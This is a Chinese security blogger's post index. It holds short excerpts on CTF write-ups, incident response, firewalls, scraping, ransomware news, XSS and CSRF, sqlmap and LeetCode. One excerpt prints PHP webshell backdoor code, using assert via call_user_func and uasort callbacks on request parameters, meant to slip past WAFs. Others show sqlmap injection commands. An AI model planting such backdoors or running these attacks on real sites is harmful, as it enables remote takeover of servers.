- 博客(224)
- 资源 (32)
- 收藏
- 关注
RSS订阅原创 读《Linux应急响应》笔记(未完待续)
今天就想听着音乐,看看书。找到压箱底的《linux应急响应》看一看。还是蛮新的,是2021.7.1的新版。文章目录思维导图挖矿事件恶意域名获取异常进程PID寻找恶意⽂件样本处理异常进程删除恶意文件善后处理思维导图挖矿事件恶意域名从内⽹dns服务器、 dns防⽕墙、流量审计设备等设备获取根据域名确定⽊⻢类型Virustotal深信服威胁情报中⼼微步在线venuseye安恒威胁情报中⼼360威胁情报中⼼绿盟威胁情报中⼼AlienVaultRedQueen安全智能服务平台IB
2021-12-06 17:08:02
1214
原创 [CTF从0到1学习] 二、CTF 密码学
密码学概述密码学是研究编制密码和破译密码的技术科学使信息保密的技术和科学学叫密码编码学破译密文的科学与技术叫密码分析学信息安全的基本模型密码学基本概念明文:没有加密的文字or字符串密文:对明文加密之后的报文加密算法:解密算法加密密钥解密密钥单钥密码体系双钥密码体系密码学的历史与发展第一阶段(1949年前) 古典密码发展阶段隐写术,暗语,隐语,藏头诗等采用手工或机械变换的方式实现单表代换密码:Caesar密码、仿射密
2021-12-05 00:11:08
9262
原创 [CTF从0到1学习] 攻防世界web wp(The novice area)
[CTF从0到1学习] 攻防世界web wp(新手区)文章目录[CTF从0到1学习] 攻防世界web wp(新手区)view-sourcerobotsbackupcookiedisabled_buttonweak_authsimple_phpget_postxff_refererwebshellcommand_executionsimple_jsview-source看看页面源码robots根据提示,或者扫描目录发现robots根据robots去找对应的php文件backup
2021-11-27 16:57:02
882
原创 [CTF从0到1学习] BUUCTF WEB部分 wp(待完善)
[CTF从0到1学习] BUUCTF WEB部分 wp(待完善)文章目录[CTF从0到1学习] BUUCTF WEB部分 wp(待完善)[HCTF 2018]WarmUp[极客大挑战 2019]EasySQL[极客大挑战 2019]Havefun[ACTF2020 新生赛]Include[强网杯 2019]随便注[HCTF 2018]WarmUp首先看看网页源码呗 <?php highlight_file(__FILE__); class emmm {
2021-11-27 01:06:19
4153
原创 [CTF从0到1学习] 二、CTF WEB安全
[CTF从0到1学习] 二、CTF WEB安全文章目录[CTF从0到1学习] 二、CTF WEB安全信息收集2-1-Where is flag2-2-Where is logo2.3粗心的小明2.4Discuz 3.2HTTP2.5 Careful2-6-你不是阿凡达2.7特殊浏览器2.8 猜猜我是谁Web安全的实验环境PHP环境java环境python环境不在赘述,环境自己配下来直接整题,以下的题目有些为本地搭建,有些为在线CTF靶场的题目信息收集2-1-Where is flag
2021-11-25 17:16:10
6409
2
原创 [CTF从0到1学习] 一、CTF 概述
[CTF从0到1学习] 一、CTF 概述哈哈,在学校图书馆借到的一本比较好的讲CTF的书籍,因为有配套资料。感觉不错,准备研读一波。先做一个引言吧‘’首先大家能搜到这篇文章,也一定对CTF有一定了解,亦或是对网络安全感兴趣。这篇文章会分享CTF的起源,模式,所需要的基本技能的一个概述。文章目录[CTF从0到1学习] 一、CTF 概述CTF起源CTF模式CTF必备的基础技能CTF环境搭建CTF起源CTF起源与1996年的DEFCON全球黑客大会,以代替之前黑客们通过互相发起真实攻击进行技术比拼的
2021-11-13 23:13:02
6158
1
原创 [python图像对抗]二、深度学习基本概念以及神经网络实现鸢尾花分类
深度学习基本概念以及神经网络实现鸢尾花分类文章目录深度学习基本概念以及神经网络实现鸢尾花分类基础知识人工智能三学派鸢尾花分类(Iris)tensorflow学习张量生成tensorflow数据类型创建张量常用函数鸢尾花数据集导入神经网络实现鸢尾花分类基础知识人工智能三学派行为主义:基于控制论,构建感知-动作控制系统。(控制论,如平衡、行走、避障等自适应控制系统)符号主义:基于算数逻辑表达式,求解问题时先把问题描述为表达式,再求解表达式。(可用公式描述,实现理性思维,如专家系统)连接主义:仿生学
2021-10-24 20:59:27
785
原创 防火墙--iptables、firewalld
防火墙–iptables(记录记录)参考https://www.yuque.com/xiaoyaozone/tldaxg/efw2v9前言iptables是fedora系列上一代防火墙,是centos/rhel 6以及6之前发行版中默认使用的防火墙服务,在rhel/centos7时代,默认的防火墙服务已经换成了firewalld,firewalld底层是使用的iptables的库,此次升级防火墙是因为iptables的使用过于复杂,命令语法不够人性化。iptables四表五链四表filt
2021-09-25 11:32:49
267
原创 SSH端口转发
文章目录端口转发概念SSH端口转发本地端口转发数据流过程解惑实验(先不做PASS掉)远程转发本地转发和远端转发对比多主机转发应用动态转发(典型科学上网解决方案)X转发血虐,被问到了我完全不知道,在此记录一下好的,之后回忆,发现自己又说NAT端口映射,大概率是自己给自己挖坑,不管怎么样,那就学习一下端口转发参考https://www.yuque.com/rjwang1982/kr42ak/dc8dc374a4ef9351e1bb2502cb6825d6https://www.cnblogs.c
2021-09-24 22:55:31
468
原创 RedHat安装MySQL5.7
RedHat安装MySQL文章目录RedHat安装MySQL安装步骤1.卸载mariaDB2.下载并安装MySQL官方的yum repository3.安装Yum Repository4.安装MySQL服务器5.MySQL数据库设置要想进入MySQL还得先找出此时root用户的密码,通过如下命令可以在日志文件中找出密码6.开启MySQL远程访问7.为firewalld添加开放端口8.修改mysql语言最后尝试远程连接redhat默认安装mariaDB,,这个是MySQL的分支,但是为了需要,还要在系统中
2021-09-07 17:23:10
1819
原创 bypass各种waf--php回调后门
文章目录bypass各种waf--php回调后门一般过狗思路双参数回调后门uasortarray_reducearray_udiff单参数后门终极奥义这个是php全版本支持的,且不报不杀稳定执行:再来一个:参考链接:bypass各种waf–php回调后门一般过狗思路call_user_func('assert', $_REQUEST['pass'])双参数回调后门uasort<?php$e=$_REQUEST['e'];$arr=array('test', $_REQUEST['p
2021-08-15 21:33:25
547
转载 新生黑客组织整合三大勒索软件,声明不会攻击特定行业
近日,一个新的勒索软件组织在各个网络犯罪论坛上发布广告,称他们正在招募合作伙伴。该勒索组织(名为BlackMatter)宣称他们已经详细研究了LockBit、REvil、Darkside的勒索软件,其项目集合了三者的优势。与一般的勒索组织不一样的是,这个新成立的勒索组织公开声称不会勒索医疗保健、关键基础设施、石油和天然气、国防、非营利组织和政府组织等特定行业。之所以会发出这样的声明,恐怕是因为黑客组织DarkSide的前车之鉴。今年5月,DarkSide攻击了美国最大的燃油管道商科洛尼尔,导致覆盖美.
2021-08-10 20:49:19
187
原创 Burpsuite工具的基础用法
Burp Suite是用于Web应用安全测试、攻击Web应用程序的集成平台,它将各种安全工具无缝地融合在一起,以支持整个测试过程中,从最初的映射和应用程序的攻击面分析,到发现和利用安全漏洞。Burp Suite为这些工具设计了许多接口,以加快攻击应用程序的过程。所有工具都共享一个请求,并能处理对应的HTTP 消息、持久性、认证、代理、日志、警报。Burp Suite结合先进的手工技术与先进的自动化,使你的工作更快,更有效,更有趣。本次主要使用的是2020.12.1版本的burpsuite略过安装、
2021-08-09 15:11:53
3067
原创 python爬虫最全总结
python爬虫–总结文章目录python爬虫--总结requests模块中中的content和text的区别IO操作写文件open()方法with open() as 方法读文件with open() as 方法创建目录JSON模块dump函数:dumps函数loads函数:get请求和post请求get请求post请求练习:re模块标题requests模块中中的content和text的区别content用来返回二进制数据,适用于保存二进制数据,例如:图片,视频,文件等text适用于显示文本数
2021-08-08 13:30:49
2721
2
转载 来势汹汹,不到一月余已有多家海外企业遭受新型勒索Hive毒手
事件背景近日,深信服终端安全团队捕获到了HIVE勒索病毒的样本,和其他勒索病毒一样,该勒索病毒会将终端上的文件加密病毒留下勒索信,且HIVE勒索团伙会在加密文件前进行数据窃取,受害者除却业务宕机之外,也存在数据泄露的风险。根据海外媒体报道,7月初加拿大商业地产软件解决方案公司 Altus Group正是遭受Hive勒索攻击导致数据泄露。且安全研究人员发现,不到一个月,该勒索团伙已公布了多家企业的数据信息。样本分析勒索方式Hive勒索病毒采用AES+RSA加密算法,在执行后,受害者终端上大部分文件会
2021-08-08 13:13:41
564
原创 CSRF攻击原理及防御和相关漏洞复现
CSRF攻击原理及防御和相关漏洞复现CSRF(Cross-site request forgery)跨站请求伪造,是一种对网站的恶意利用。尽管听起来像跨站脚本(XSS),但它与XSS非常不同,XSS利用站点内的信任用户,而CSRF则通过伪装来自受信任用户的请求来利用受信任的网站。与XSS攻击相比,CSRF攻击往往不大流行(因此对其进行防范的资源也相当稀少)和难以防范,所以被认为比XSS更具危险性。CSRF攻击原理及过程:过程1.用户打开浏览器,访问受信任银行网站,输入用户名密码请求登陆网站2.在
2021-08-08 12:53:27
1993
转载 EA对勒索无动于衷,黑客曝光全部数据!
EA对勒索无动于衷,黑客曝光全部数据!《模拟人生》《极品飞车》《战地》《FIFA》,应该都是大家耳熟能详的游戏。出品这些游戏的美国艺电公司(EA),在全球范围内有超过4.5亿注册玩家。就是这么一家知名公司,前段时间发生了数据泄漏事件。与以往不同,这次数据泄露事件被盗的不是用户的数据,而是EA的源代码。黑客一开始以2800万美元的价格寻找买家未果,随后用这些数据勒索EA,然而EA也无动于衷。黑客一直等待到7月26日,最后在一个地下网络犯罪论坛曝光了这些数据。事件追溯到6月10日,有黑客在黑客论坛发帖声称
2021-08-06 00:06:11
364
1
转载 美油管运营商被勒索事件
美油管运营商被勒索事件5月8号(上周五),美国最大的燃油料管道-殖民地管道公司(Colonial Pipeline)受到网络攻击,该公司主动采取一定的系统隔离措施,同时暂停了所有流水线作业,公司被迫关闭运营,Colonial Pipeline位于墨西哥湾沿岸的炼油厂与美国南部和东部市场之间运输精炼石油产品。该公司每天通过其5500英里的管道输送250万桶石油,占东海岸所有燃料消耗的45%,该管道系统横跨得克萨斯州休斯敦和新泽西州林登之间的5500多英里。在通告中Colonial Pipeline证实了此
2021-08-05 23:45:21
334
原创 XSS攻击及防御总结和各平台通关思路
XSS原理跨站脚本攻击XSS(cross site scripting)。XSS是由于Web应用程序对用户的输入过滤不足而产生的,攻击者利用网站漏洞把恶意的脚本代码注入到网页中,当其他用户浏览这些网页时,就会执行其中的恶意代码,对受害者可能采用cookie窃取、会话劫持、钓鱼欺骗等各种攻击。漏洞存在的主要原因:参数输入未经过安全过滤恶意脚本被输出到网页用户的浏览器执行了恶意脚本XSS漏洞分类1.反射型XSS也称非持久型、参数型跨站脚本。主要用于恶意脚本附加在URL地址的参数中。他需要欺骗
2021-08-05 23:27:54
3611
5
原创 Linux文本三剑客--grep、sed、awk
Linux文本三剑客–grep、sed、awk文章目录Linux文本三剑客--grep、sed、awk1、grep1.1什么是grep1.2使用grep命令格式命令参数基本正则表表达式匹配字符匹配次数位置锚点:定位出现的位置扩展正则表达式2.sed2.1什么是sed2.2使用sed命令格式常用选项options地址定界编辑命令commandsed用法演示地址界定演示编辑命令command演示sed高级编辑命令① 案例:倒序输出文本内容① 显示偶数行② 倒序显示③ 显示奇数行④ 显示最后一行⑤ 每行之间加空
2021-07-23 21:11:48
685
原创 python爬虫--类级别写法
类级别写法爬取糗事百科段子前文回顾python爬虫–爬取9某1看剧网电视剧python爬虫–爬取网易云音乐评论python爬虫–scrapy(再探)python爬虫–scrapy(初识)python爬虫–selenium模块文章目录前文回顾python爬虫--爬取9某1看剧网电视剧python爬虫--爬取网易云音乐评论python爬虫--scrapy(再探)python爬虫--scrapy(初识)python爬虫--selenium模块思路:代码效果图思路:模块化需要的模块有发送请
2021-07-20 23:27:12
471
2
原创 sql-labs(1~10)详细思路
sql-labs(1~10)参考:https://space.bilibili.com/29903122/https://forum.90sec.com/t/topic/1774sql-labs安装Github下载地址:https://github.com/Audi-1/sqli-labs相关组件下载安装phpstudy储备知识(information_schema)参考链接:https://blog.youkuaiyun.com/kikajack/article/details/8006575
2021-07-19 22:21:27
304
2
原创 记一次sql注入实战
记录一下第一次拿站偶然的时间,偶然的网址我看到了偶然的一次sql注入,苦苦寻找的小网站在那一瞬间被找到,一个字爽。但是拿站的过程是曲折的。首次看到这个后台管理页面,没有验证码,所以尝试sql注入。简单试了试,决定查看是否存在POST注入。首先使用代理Brupsuite进行抓包,抓取请求包。将请求包中的内容,粘贴到文本中。之后使用sqlmap进行注入python sqlmap.py -r "test.txt" 然后查看当前所在的数据库,查看当前用户python sqlmap.py -r
2021-07-12 21:09:15
630
2
原创 【复现】windows Chrome 0day漏洞
文章目录【复现】windows Chrome 0day漏洞0x01漏洞描述0x02漏洞详情0x03漏洞复现1.首先关闭Chrome浏览器的沙盒模式2.再次打开浏览器,发现出现`-no-sandbox`,3.代码程序4.漏洞复现(打开html)参考链接:https://www.pwnwiki.org/index.php?title=Windows_Chrome_0day%E6%BC%8F%E6%B4%9Ehttp://pub-shbt.s3.360.cn/cert-public-file/%E3%80
2021-07-05 00:17:43
471
原创 牛客【2021】第三次校招模拟笔试(编程题部分)
牛客【2021】第三次校招模拟笔试(编程题部分)第一题:牛牛A+B牛妹在黑板上写下两个正整数a,b。她想让牛牛帮忙计算“A+B”,牛牛一听,这还不简单?但是牛妹说:此“A+B”非彼“A+B”,而是要先把a重复b次,把b重复a次,再计算刚刚得到的这两个数字的和。这下可难到了牛牛,请帮助牛牛解决这个问题吧!现在给你a,b返回牛妹要求的正确答案。思路:转换为字符串class Solution: def NNAplusB(self , a , b ): a,b = int(str(a
2021-06-25 09:31:57
1084
原创 LeetCode:268. 丢失的数字、1404. 将二进制表示减到 1 的步骤数
268. 丢失的数字法1:遍历寻找class Solution: def missingNumber(self, nums: List[int]) -> int: for i in range(len(nums)+1): if i not in nums: return i法2:哈希表class Solution: def missingNumber(self, nums: List[int]) -> int:
2021-06-22 11:00:41
171
1
原创 云计算的前世今生
文章目录云计算的前世今生一、云计算定义二、云计算发展背景三、云计算的特点及分类1.云计算特点2.云计算分类四、云计算和网格计算网格计算云计算和网格计算的关系五、云计算与物联网、移动互联网物理网智慧地球六、云计算的全球影响美国中国云计算的前世今生云计算已经成为全球ICT(信息通讯技术,Information Communication Technology)产业界公认的发展重点。各国政府积极通过政策引导、资金投入等方式加快本国云计算的战略布局和产业发展。一、云计算定义早期简单定义:云计算是指任何能够
2021-06-19 17:50:03
5135
6
原创 LeetCode:1720. 解码异或后的数组、190. 颠倒二进制位
1720. 解码异或后的数组class Solution: def decode(self, encoded: List[int], first: int) -> List[int]: ''' 例子: 101^011 = 110 101^110 = 011 a^b^b = a 异或的性质 ''' arr = [first] for i in range(len(encoded)
2021-06-18 12:54:46
124
1
原创 linux--进程管理和监控
文章目录SHELL命令处理方式:通配符重定向进程管理与系统监控基本概念1.进程2.作业3.进程的状态4.进程的优先级启动进程与作业1.进程与作业的启动方式2.作业的前后台切换3.管理进程与作业的Shell命令(1)jobs [选项]:显示当前所有作业(2)ps [选项]:显示进程的状态。无选项时显示当前用户在当前终端启动的进程(3)pstree:以树形图显示当前系统进程(4)kill:终止正在运行的进程或作业。超级用户可终止所有进程,普通用户只能终止自己启动的进程。4.进程调度(1)at调度(2)batch
2021-06-17 19:29:45
883
11
原创 LeetCode:1486. 数组异或操作
1486. 数组异或操作解法1:遍历异或class Solution: def xorOperation(self, n: int, start: int) -> int: res = 0 for i in range(0,n): res ^= start start += 2 return res解法2:找规律由上图可推算出,当n%4==0时,res = n 只剩一个数字当
2021-06-16 20:33:24
120
原创 sql注入漏洞--sqlmap使用
文章目录sql注入漏洞--sqlmap使用基本流程:实战get请求命令:`python sqlmap.py -u "http://testphp.vulnweb.com/artists.php?artist=1" --users`命令:`python sqlmap.py -u "http://testphp.vulnweb.com/artists.php?artist=1" --dbs`命令:`python sqlmap.py -u "http://testphp.vulnweb.com/artists.p
2021-06-16 17:16:04
2942
5
原创 Linux存储管理基础
文章目录Linux基础知识自由软件、开源软件、免费软件Linux的内核版本Linux系统结构内核(Kernel)ShellX windowLinux基本管理CPU管理存储管理文件管理设备管理Linux基础知识自由软件、开源软件、免费软件自由软件:自由软件基金会提出通用公共许可证(GPL)。通过GPL允许用户自由下载、分发、修改和再分发源代码公开的自由软件,并可向使用者收取一定的服务费用,但不允许任何人将源代码与服务做任何形式的捆绑式销售。开源软件:在发行时提供源代码,并授权允许用户更改和发布,但与
2021-06-16 11:17:37
1393
13
原创 LeetCode:143. 重排链表
143. 重排链表法1:借助列表存储节点对象# Definition for singly-linked list.# class ListNode:# def __init__(self, val=0, next=None):# self.val = val# self.next = nextclass Solution: def reorderList(self, head: ListNode) -> None: "
2021-06-16 10:01:41
175
17
原创 LeetCode:61.旋转链表(python3)
61.旋转链表法1:合环解环法# Definition for singly-linked list.# class ListNode:# def __init__(self, val=0, next=None):# self.val = val# self.next = nextclass Solution: def rotateRight(self, head: ListNode, k: int) -> ListNode:
2021-06-15 18:20:46
193
2
原创 LeetCode:14. 最长公共前缀、581. 最短无序连续子数组(python3)
14. 最长公共前缀方法1: 纵向扫描法class Solution: def longestCommonPrefix(self, strs: List[str]) -> str: #纵向扫描法 com = "" #用来收集LCP #特殊情况,只有数组只有一个元素,LCP为本身 if len(strs)==1: return strs[0] #作为字符的索引 for i in range(len(min(
2021-06-14 16:39:05
91
原创 剑指 Offer 15. 二进制中1的个数、693. 交替位二进制数
剑指 Offer 15. 二进制中1的个数法1:转换为字符串形式,计数“1”class Solution: def hammingWeight(self, n: int) -> int: #法1:转换为字符串形式,计数“1” # n = str(bin(n))[2::] # print(n) # res = 0 # for s in n: # if s == "1":
2021-06-09 14:54:55
98
11
原创 LeetCode:118.杨辉三角、面试题 17.01. 不用加号的加法
118. 杨辉三角class Solution: def generate(self, numRows: int) -> List[List[int]]: res = [] line = [1] for i in range(numRows): res.append(line) line = [1] + [line[i]+line[i+1] for i in range(len(line)-1)
2021-06-07 16:29:10
236
13
原创 5777. 使数组元素相等的减少操作次数
文章目录5777. 使数组元素相等的减少操作次数超时超时改进超时改进官方题解:一次遍历5777. 使数组元素相等的减少操作次数思路:寻找当前数前面有多少种不同的数字超时class Solution: def reductionOperations(self, nums: List[int]) -> int: # count = 0 # while (min(nums)*len(nums)) != sum(nums): # num
2021-06-06 13:54:13
142
1
原创 LeetCode:707. 设计链表(python3)
文章目录707. 设计链表法1:规规矩矩写链表法2:巧用列表法(开辟新思路)707. 设计链表既然遇到这个题,就再次回顾一下,链表的创建吧法1:规规矩矩写链表#初始化节点函数class Node: def __init__(self,val): self.val = val self.next = Noneclass MyLinkedList: #初始化链表 def __init__(self,node=None): """
2021-06-05 20:05:12
281
8
ospf LSA.zip
2021-05-08
E-Trunk.zip
2021-01-24
赛点资源数据包_单片机_2020.zip
2020-11-24
串口通信接收端将串口接收过来的数据显示在数码管上.rar
2020-06-03
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人